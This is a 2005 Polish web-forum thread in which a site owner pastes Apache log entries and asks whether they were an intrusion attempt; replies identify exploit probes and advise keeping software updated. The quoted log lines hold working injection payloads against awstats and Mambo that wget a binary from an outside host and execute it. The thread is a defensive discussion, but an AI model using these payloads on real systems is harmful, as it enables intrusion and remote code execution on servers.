Forum PHP.pl

Forum PHP.pl > Forum > Serwery WWW > Apache

Dziwny Log, A może próba dostępu ?

XhtmlProject Zobacz profil	21.12.2005, 02:34:04 Post #1
Grupa: Zarejestrowani Postów: 40 Pomógł: 0 Dołączył: 11.11.2005 Skąd: RuskieJaKraina Ostrzeżenie: (0%)	Witajcie. Chciałem zapytać co oznaczają poniższe wpisy z log'a Apache'a: Cytat 217.174.252.237 - - [20/Dec/2005:21:55:55 +0100] "GET /awstats/awstats.pl?configdir=\|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo\| HTTP/1.1" 403 220 217.174.252.237 - - [20/Dec/2005:21:55:56 +0100] "GET /cgi-bin/awstats.pl?configdir=\|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo\| HTTP/1.1" 404 216 217.174.252.237 - - [20/Dec/2005:21:55:58 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=\|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo\| HTTP/1.1" 404 224 217.174.252.237 - - [20/Dec/2005:21:55:59 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo\| HTTP/1.1" 403 212 217.174.252.237 - - [20/Dec/2005:21:56:00 +0100] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo\| HTTP/1.1" 403 211 217.174.252.237 - - [20/Dec/2005:21:56:01 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo\| HTTP/1.1" 403 218 217.174.252.237 - - [20/Dec/2005:21:56:02 +0100] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo\| HTTP/1.1" 403 216 217.174.252.237 - - [20/Dec/2005:21:56:03 +0100] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo\| HTTP/1.1" 403 222 213.134.160.9 - - [20/Dec/2005:23:03:08 +0100] "GET / HTTP/1.0" 403 202 Jeśli była to próba dostępu chciałbym wiedzieć jak mogę się przed nią bronić. Mam zainstalowanego Apache 2.0.54 + PHP5 +MySQL4 na WinXP, przy czym w konfigu Apache'a zmieniłem dla bezpieczeństwa następujące dyrektywy: UseCanonicalName Off ServerSignature Off HostnameLookups Off ServerTokens Prod Dodatkowo wszędzie powyłączałem opcje AllowOverride aby działały pliki .htaccess Jeszcze jedno pytanie: Jak powinienem skonfigurować Apache'a abym spał spokojnie. -------------------- Flash

Start new topic

Odpowiedzi (1 - 4)

Radarek Zobacz profil	26.12.2005, 19:43:20 Post #2
Grupa: Zarejestrowani Postów: 188 Pomógł: 0 Dołączył: 23.05.2005 Ostrzeżenie: (0%)	Sa to proby wykorzystania luk w oprogramowaniu. Zabezpieczenie apache nie ma tu nic do gadania. Albo ktos szukal jakis luk, albo je zna i chcial je wykorzystac. Jesli wszystko dziala na serwerze tak jak dzialalo to zapewne atak sie nie udal. Jak sie bronic? Uzywac przetestowanych skryptow/cmsow, pisac bezpieczne skrypty .

XhtmlProject Zobacz profil	26.12.2005, 21:57:23 Post #3
Grupa: Zarejestrowani Postów: 40 Pomógł: 0 Dołączył: 11.11.2005 Skąd: RuskieJaKraina Ostrzeżenie: (0%)	Cytat(Radarek @ 2005-12-26 19:43:20) Sa to proby wykorzystania luk w oprogramowaniu. Zabezpieczenie apache nie ma tu nic do gadania. Albo ktos szukal jakis luk, albo je zna i chcial je wykorzystac. Jesli wszystko dziala na serwerze tak jak dzialalo to zapewne atak sie nie udal. Jak sie bronic? Uzywac przetestowanych skryptow/cmsow, pisac bezpieczne skrypty . Czy takie (udane) proby moga pozwolic osobie ktora je przeprowadza na przegladanie zasobow dysku twardego ? -------------------- Flash

Radarek Zobacz profil	26.12.2005, 22:14:27 Post #4
Grupa: Zarejestrowani Postów: 188 Pomógł: 0 Dołączył: 23.05.2005 Ostrzeżenie: (0%)	Hm jesli dziura umozliwia takie dzialanie to mozliwe jest wszystko na co pozwala ta dziura :-). Nie powiem ci jak jest w twoim przypadku, bo nie wiem co tam uzywasz (choc widze zdaje sie cms mambo). Sa dziury dzieki ktorym mozna skasowac cala baze, przegladac pliki na serwerze i wiele wiele innych rzeczy :-). Generalnie trzeba czesto aktualizowac uzywane oprogramowanie. Sprawdz czy sa dostepne nowsze wersje oprogramowania ktorego uzywasz (mowie tu o php a nie np o linuxie). Jesli takie wpisy nie beda sie powtarzac to zapewne koles dal sobie siana :-). A tak przy okazji to jak zauwazyles te wpisy? Twoje hobby to przegladanie logow serwera www?

XhtmlProject Zobacz profil	28.12.2005, 01:09:41 Post #5
Grupa: Zarejestrowani Postów: 40 Pomógł: 0 Dołączył: 11.11.2005 Skąd: RuskieJaKraina Ostrzeżenie: (0%)	Cytat(Radarek @ 2005-12-26 22:14:27) A tak przy okazji to jak zauwazyles te wpisy? Twoje hobby to przegladanie logow serwera www? Zgadza się - świata po za tym nie widzę Btw. -> THX za info. Pozdrawiam. -------------------- Flash

« Następny starszy · Apache · Następny nowszy »

Reply to this topic

Start new topic

1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Wersja Lo-Fi

Aktualny czas: 19.07.2025 - 16:55

Powered By IP.Board © 2025 IPS, Inc.
All changes by PHP.pl Administrators

Hosting zapewnia

NQ.pl hosting, trac, svn